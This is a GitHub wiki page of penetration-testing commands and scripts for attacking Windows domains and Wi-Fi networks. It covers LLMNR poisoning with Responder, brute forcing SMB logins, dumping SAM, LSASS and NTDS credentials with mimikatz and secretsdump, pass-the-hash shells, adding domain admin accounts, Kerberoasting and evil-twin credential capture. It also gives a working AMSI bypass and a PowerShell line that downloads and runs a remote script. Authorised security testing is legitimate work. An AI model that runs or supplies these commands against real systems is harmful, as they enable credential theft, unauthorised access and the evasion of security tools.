Nadeem Salim edited this page Dec 10, 2018 · 80 revisions

Welcome to the Pentest-Commands-and-dirty-scripts- wiki!

Nmap DNS lookup

nmap -sL -R --dns-servers 8.8.8.8 -iL hostnames.txt -vv -oA output

Eyewitness

./EyeWitness.py -f /root/blah.nessus --web -d COMPANY --timeout 20 --no-prompt --prepend-https --no-dns

Responder

Grab NetNTLM (challenge/response) hashes off the network by poisoning LLMNR/NBT-NS name lookups

Without wpad:

responder -I eth0

With wpad:

responder -I eth0 --wpad -b -f -F

Filter the logs folder down to one line per account and remove machine accounts (names ending in $):

sort -m *.txt | uniq -d | awk '!/\$/'

Note that uniq -d only prints lines that occur more than once; use plain uniq if you want every distinct hash line.
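A slightly more careful version of that filter, added here as an example (not from the original wiki): one hash per DOMAIN\user regardless of case and of which poisoner (SMB, HTTP, ...) caught it, machine accounts dropped, and it works on NTLMv1 and NTLMv2 lines alike because both use the user::DOMAIN:... layout. The log directory, file names and hash values in make_sample_logs are constructed for the demo.

```shell
#!/bin/sh
# Added example, not part of the original wiki.
# responder_hashes LOGDIR
#   Reads every Responder *NTLMv1*.txt / *NTLMv2*.txt file in LOGDIR and prints one
#   hash line per DOMAIN\user: case-insensitive, machine accounts (name ends in $)
#   removed, first capture wins. Output stays in the original hashcat/john format.
responder_hashes() {
    cat "$1"/*NTLMv*.txt 2>/dev/null | awk -F'::' '
        NF < 2      { next }            # not a hash line
        $1 ~ /\$$/  { next }            # machine account, e.g. WS01$
        {
            split($2, p, ":")           # p[1] is the domain the client sent
            key = tolower(p[1]) "\\" tolower($1)
        }
        !seen[key]++                    # print only the first hash per account
    '
}

# Constructed sample logs (fake hashes, fake hosts) so the function can be tried offline.
make_sample_logs() {
    mkdir -p "$1"
    cat > "$1/SMB-NTLMv2-SSP-10.0.0.5.txt" <<'EOF'
jsmith::CORP:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000aa
WS01$::CORP:1122334455667788:fedcba9876543210fedcba9876543210:010100000000000000bb
EOF
    cat > "$1/HTTP-NTLMv2-10.0.0.7.txt" <<'EOF'
JSMITH::corp:1122334455667788:00112233445566778899aabbccddeeff:010100000000000000cc
ajones::CORP:1122334455667788:ffeeddccbbaa99887766554433221100:010100000000000000dd
EOF
}

# Usage: responder_hashes /usr/share/responder/logs > to-crack.txt
```

Feed the output straight to john or hashcat; the lines are untouched, only filtered.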

Cracking with John:

john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt

Use hashcat on a more powerful box. This is only for easy wins.

Extract local admin hash from workstation/laptop

samdump2 SYSTEM SAM > hashes.txt

Grab employee names from LinkedIn

theharvester -d blah.com -l 1000 -b linkedin

Change the format to b.lah (first initial, dot, surname). The list is assumed to hold one "First Last" name per line:

awk '{ print tolower(substr($1,1,1) "." $NF) }' linkedin-user-list.txt
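Added example (not from the original wiki): a shell function that builds usernames in several common corporate formats from the same list, deduplicates, strips hyphens and apostrophes, and drops the trailing " - Title at Company" text that theHarvester leaves on LinkedIn results. The names in sample_names are made up; the format names (f.last, flast, first.last, firstl) are this example's own.

```shell
#!/bin/sh
# Added example, not part of the original wiki.
# gen_usernames FILE [FORMAT]
#   FILE holds one person per line ("First Last", "First Middle Last", or the raw
#   theHarvester LinkedIn line "First Last - Title at Company").
#   FORMAT (names invented for this example): f.last (b.lah, the default),
#   flast (blah), first.last (blah.lah), firstl (blahl).
gen_usernames() {
    file="$1"
    fmt="${2:-f.last}"
    awk -v fmt="$fmt" '
        { sub(/ - .*/, "") }                      # drop " - Title at Company"
        NF < 2 { next }                           # need at least a first and last name
        {
            first = tolower($1); last = tolower($NF)
            gsub(/[^a-z]/, "", first)             # Anne-Marie -> annemarie
            gsub(/[^a-z]/, "", last)              # drop apostrophes and hyphens
            if (first == "" || last == "") next
            if (fmt == "f.last")          u = substr(first, 1, 1) "." last
            else if (fmt == "flast")      u = substr(first, 1, 1) last
            else if (fmt == "first.last") u = first "." last
            else if (fmt == "firstl")     u = first substr(last, 1, 1)
            else { print "unknown format: " fmt > "/dev/stderr"; exit 1 }
            if (!seen[u]++) print u               # the same person twice -> one username
        }' "$file"
}

# Constructed sample input; these are not real people.
sample_names() {
    printf '%s\n' "Blah Lah" "Blah Lah" "Jane Q Public" "Anne-Marie O'Neil" "Madonna" \
        "Tom Smith - Security Engineer at Corp"
}

# Usage: gen_usernames linkedin-user-list.txt f.last > users.txt
```

Generate one file per format and run each through the krb5-enum-users check below; whichever format returns valid accounts is the one the domain uses.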

Check usernames against AD:

Handy if you have generated a list from linkedin or a list of usernames.

nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"

username list is located at /usr/local/share/nmap/nselib/data/usernames.lst in Kali

Null sessions

Often still works on infrastructure that was upgraded in place rather than rebuilt.

net use \\IP_ADDRESS\ipc$ "" /user:""

Bruteforce using hydra (check the lockout threshold with net accounts /domain first and stay below it):

hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V

Bruteforce using net use:

@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL

Check SMB signing

nmap --script smb-security-mode -p445 -iL 445-open.txt -vv -T4 -oA smb-signing

Pull the IPs with signing disabled out of the .nmap output:

awk '/^Nmap/ {a=$0} /signing: disabled/ {print a}' smb-signing.nmap | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > smb-disabled.txt
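Added example (not from the original wiki): parse the .nmap output of that scan into "ip status" lines and list relay targets, i.e. hosts where message_signing is anything other than required (smb-security-mode reports disabled, supported or required). The one-liner above only catches "disabled"; hosts that merely support signing can be relayed to just the same. The scan output in sample_nmap_output is constructed.

```shell
#!/bin/sh
# Added example, not part of the original wiki.
# smb_signing_status FILE.nmap
#   Prints "ip status" for every host in the .nmap output of an smb-security-mode scan.
#   status is what the script reported: disabled, supported or required.
smb_signing_status() {
    awk '
        /^Nmap scan report for / {
            host = $NF                          # "for 10.0.0.5" or "for dc1 (10.0.0.5)"
            gsub(/[()]/, "", host)
        }
        /message_signing: / {
            match($0, /message_signing: [a-z]+/)
            print host, substr($0, RSTART + 17, RLENGTH - 17)   # 17 = length of "message_signing: "
        }' "$1"
}

# relay_targets FILE.nmap
#   Hosts where signing is not required, i.e. candidates for SMB relay (ntlmrelayx.py -tf).
relay_targets() {
    smb_signing_status "$1" | awk '$2 != "required" { print $1 }'
}

# Constructed scan output in the shape nmap -oA writes; hosts and timings are made up.
sample_nmap_output() {
    cat <<'EOF'
Nmap scan report for 10.0.0.5
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for dc1.corp.local (10.0.0.1)
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|_  message_signing: required

Nmap scan report for 10.0.0.9
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|_  message_signing: supported
EOF
}

# Usage: relay_targets smb-signing.nmap > relay-targets.txt
```

The relay-targets list drops straight into ntlmrelayx.py -tf; domain controllers normally show "required" and fall out of the list.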

Running Shell commands as domain user from non-domain joined machine

When you have an initial set of compromised creds run these from a Virtual Machine.

C:\runas.exe /netonly /user:BLAHDOMAIN\blahuser "cmd.exe"

Check which DC you are talking to:

nltest /dsgetdc:domain.local

To change DC via registry to point at domain being tested:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters

Set the "SiteName" value to DC1.domain.com

Create a session for use with DumpSec:

net use \\10.0.0.1\ipc$ /user:domain.local\username password

Quick User lists and password policy enum

net users /domain

net group /domain "Domain Admins"

net accounts /domain

Note that the above commands do not work with runas. Below PowerView functions will work with runas.

Powerview:

. .\PowerView.ps1

Get-UserProperty -Properties samaccountname

Get-NetGroupMember

Get-DomainPolicy

Search shares and files using Invoke-FileFinder and Invoke-ShareFinder

Bloodhound

Run locally on non-domain joined machine (remember to add target domain to registry):

. .\BloodHound.ps1

Invoke-BloodHound

Run from remote shell

Useful when you have a remote shell.

powershell Set-ExecutionPolicy RemoteSigned

powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"

Run from web server or over Internet:

Use this when you cannot copy BloodHound.ps1 over to target.

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); Invoke-BloodHound"

Winexe to boxes (not opsec safe): a service is created and run on the target, with no cleanup.

pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%blahpassword cmd

pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%hash cmd

Impacket psexec.py to boxes (not opsec safe): it cleans up after itself, but installing and running the service still leaves logs on the target (a Service Control Manager event 7045 at minimum).

psexec.py user@IP

psexec.py user@IP -hashes ntlm:hash

Impacket wmiexec.py (more opsec safe: no service is installed, but it shows up if WMI logging is enabled, and command output is written to a temp file on the target's ADMIN$ share and read back over SMB)

wmiexec.py user@IP

wmiexec.py user@IP -hashes ntlm:hash

Impacket smbclient (probably opsec safe as it is only SMB file access)

python smbclient.py domain/user@IP -hashes aad3b435b51404eeaad3b435b51404ee:blah

(aad3b435b51404eeaad3b435b51404ee is the empty-LM constant; only the NT half matters.)

Password dumping

From Live Kali on a workstation

samdump2 SYSTEM SAM > hashes.txt

Local

C:\> reg.exe save hklm\sam c:\temp\sam.save

C:\> reg.exe save hklm\security c:\temp\security.save

C:\> reg.exe save hklm\system c:\temp\system.save

secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

pwdump system sam

In Memory

C:\> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1

C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit

Domain

To find where NTDS is run the below:

reg.exe query hklm\system\currentcontrolset\services\ntds\parameters

vssadmin

C:\> vssadmin list shadows

C:\> vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

secretsdump.py -system SYSTEM -ntds ntds.dit -just-dc-ntlm LOCAL

vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}

ntdsutil

ntdsutil: activate instance ntds

ntdsutil: snapshot

snapshot: list all

snapshot: create

snapshot: list all

snapshot: mount 1

The mount prints a path like C:\$SNAP_<timestamp>_VOLUMEC$\; copy windows\ntds\ntds.dit and windows\system32\config\SYSTEM out of it and feed them to secretsdump as above.

Cleanup snapshots:

snapshot: list all

snapshot: unmount 1

snapshot: list all

snapshot: delete 1

Add user to local admin and domain admin

Domain Admin

net user username password /ADD /DOMAIN

net group "Domain Admins" username /ADD /DOMAIN

Local Admin

net user username password /ADD

net localgroup Administrators username /ADD

Tasklist scraper

#!/bin/sh
# Pass-the-hash to every host in ip.txt (one IP per line) and dump network config and running processes
while read -r ip; do
    pth-winexe -U Admin%hash "//$ip" "ipconfig"
    pth-winexe -U Admin%hash "//$ip" "tasklist /v"
done < ip.txt

Kerberoasting

This is the best script:

https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1

Invoke-AutoKerberoast

Hashcat on the Alienware (GPU box) - Kerberoast TGS hash cracking

sudo apt-get install nvidia-367

sudo nvidia-smi

reboot

sudo hashcat -I

hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst

Mode 13100 is Kerberos 5 TGS-REP etype 23 (RC4-HMAC), the usual Kerberoast ticket format; AES tickets (etype 17/18) need modes 19600/19700 instead.

LAPS - GetLAPSPasswords

https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1

Wireless setup and evil twin attack

Check if card is connected through USB:

lsusb

Edit sources.list to setup correct Kali source

/etc/apt/sources.list

deb http://http.kali.org/kali kali-rolling main non-free contrib

Update and dist-upgrade

apt-get update

apt-get dist-upgrade

reboot

Installing driver for card:

apt-get install realtek-rtl88xxau-dkms

To load the driver manually:

modprobe 8812au

To check if drivers are all good to go:

modinfo 8812au

iwconfig

Basic sniffing:

airodump-ng wlan0

Setup card as AP to capture creds:

Either apt-get install hostapd-wpe or clone it from the GitHub repo and build it as below:

git clone https://github.com/OpenSecurityResearch/hostapd-wpe

It needs some libs:

apt-get install libssl-dev libnl-genl-3-dev

Get hostapd

wget http://hostap.epitest.fi/releases/hostapd-2.6.tar.gz

tar -xvf hostapd-2.6.tar.gz

cd hostapd-2.6/

Patch hostapd-wpe to hostapd

patch -p1 < ../hostapd-wpe/hostapd-wpe.patch

cd hostapd/

Get the following packages to make:

apt-get install pkg-config

apt-get install libssl1.0-dev

make

Move to the certs folder and edit server.cnf and ca.cnf so the certificate CN (and organisation) match what the target SSID's real RADIUS server presents; otherwise clients that validate the server cert will warn.

cd ../../hostapd-wpe/

cd certs/

Bootstrap to setup the certs:

./bootstrap

Run hostapd-wpe to start capturing auth:

./hostapd-wpe hostapd-wpe.conf

Newer Kali config locations

/etc/hostapd-wpe

Basic troubleshooting for the card:

To kill processes card maybe attached to:

airmon-ng check kill

To use card with network manager:

service network-manager start

If the card is hard or soft blocked by rfkill:

rfkill list all

rfkill unblock all

setup monitor mode

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

Change channels

Set channel 6, width 40 MHz:

sudo iw wlan0 set channel 6 HT40-

Set channel 149, width 80 MHz:

sudo iw wlan0 set freq 5745 80 5775

Transmit power (30 dBm, which iw takes as 3000 mBm; the card and regulatory domain cap what actually applies):

sudo iwconfig wlan0 txpower 30

or

sudo iw wlan0 set txpower fixed 3000

Kali hotspot

Change name -> Settings>Sharing or Settings>Details>About.

Change password

nmcli connection modify Hotspot 802-11-wireless-security.key-mgmt wpa-psk 802-11-wireless-security.psk mypassword

Powershell AMSI Bypass

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

This one-liner is well known and the strings AmsiUtils / amsiInitFailed are themselves flagged by AMSI on patched Defender; expect to have to obfuscate it.

NAC Bypass with FENRIR

sysctl net.ipv4.ip_forward=1

ifconfig eth1 promisc

ifconfig eth2 promisc

Important: Make sure to connect host to eth1 first,then eth2 to switch.

FENRIR > create_virtual_tap

FENRIR > set hostIface eth1
hostIface ===> eth1

FENRIR > set host_ip 192.168.31.135
host_ip ===> 192.168.31.135

FENRIR > set host_mac 509a4c505cda
host_mac ===> 509a4c505cda

FENRIR > set netIface eth2
netIface ===> eth2

FENRIR > add_reverse_rule 137 multi IP
New rule added : port = 137 type = multi proto = IP

FENRIR > add_reverse_rule 5355 multi IP
New rule added : port = 5355 type = multi proto = IP

FENRIR > add_reverse_rule 445 unique IP
New rule added : port = 445 type = unique proto = IP

FENRIR > run_debug

route add default gw 10.0.0.42

MS17-010 Nmap Scan

nmap -Pn -p445 --open --script smb-vuln-ms17-010 ip_address
